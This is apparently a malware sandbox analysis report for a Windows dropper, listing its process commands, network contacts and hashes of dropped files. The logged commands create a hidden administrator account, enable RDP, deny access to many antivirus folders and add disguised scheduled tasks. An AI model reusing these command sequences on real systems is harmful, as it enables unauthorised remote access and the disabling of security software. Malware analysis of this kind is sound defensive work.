C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\bat.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-288689378-876327943-217641628-191327148614229571531383836086620444591577834264"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 109.248.203.81:21 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 109.248.203.81:21 | tcp | |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
| DE | 148.251.234.83:443 | iplogger.org | tcp |
Files
memory/1704-54-0x00000000755B1000-0x00000000755B3000-memory.dmp
\ProgramData\Microsoft\Intel\wini.exe
| MD5 | f9a9b17c831721033458d59bf69f45b6 |
| SHA1 | 472313a8a15aca343cf669cfc61a9ae65279e06b |
| SHA256 | 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce |
| SHA512 | 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8 |
C:\ProgramData\Microsoft\Intel\wini.exe
| MD5 | f9a9b17c831721033458d59bf69f45b6 |
| SHA1 | 472313a8a15aca343cf669cfc61a9ae65279e06b |
| SHA256 | 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce |
| SHA512 | 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8 |
memory/1888-56-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Intel\wini.exe
| MD5 | f9a9b17c831721033458d59bf69f45b6 |
| SHA1 | 472313a8a15aca343cf669cfc61a9ae65279e06b |
| SHA256 | 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce |
| SHA512 | 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8 |
\ProgramData\install\cheat.exe
| MD5 | c097289ee1c20ac1fbddb21378f70410 |
| SHA1 | d16091bfb972d966130dc8d3a6c235f427410d7f |
| SHA256 | b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2 |
| SHA512 | 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d |
memory/1880-61-0x0000000000000000-mapping.dmp
C:\ProgramData\install\cheat.exe
| MD5 | c097289ee1c20ac1fbddb21378f70410 |
| SHA1 | d16091bfb972d966130dc8d3a6c235f427410d7f |
| SHA256 | b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2 |
| SHA512 | 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d |
C:\programdata\install\cheat.exe
| MD5 | c097289ee1c20ac1fbddb21378f70410 |
| SHA1 | d16091bfb972d966130dc8d3a6c235f427410d7f |
| SHA256 | b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2 |
| SHA512 | 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d |
memory/1764-65-0x0000000000000000-mapping.dmp
\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
memory/324-70-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
C:\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
C:\ProgramData\Windows\install.vbs
| MD5 | 5e36713ab310d29f2bdd1c93f2f0cad2 |
| SHA1 | 7e768cca6bce132e4e9132e8a00a1786e6351178 |
| SHA256 | cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931 |
| SHA512 | 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1 |
\ProgramData\install\ink.exe
| MD5 | ef3839826ed36f3a534d1d099665b909 |
| SHA1 | 8afbee7836c8faf65da67a9d6dd901d44a8c55ca |
| SHA256 | 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040 |
| SHA512 | 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8 |
memory/1492-81-0x0000000000000000-mapping.dmp
\ProgramData\install\ink.exe
| MD5 | ef3839826ed36f3a534d1d099665b909 |
| SHA1 | 8afbee7836c8faf65da67a9d6dd901d44a8c55ca |
| SHA256 | 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040 |
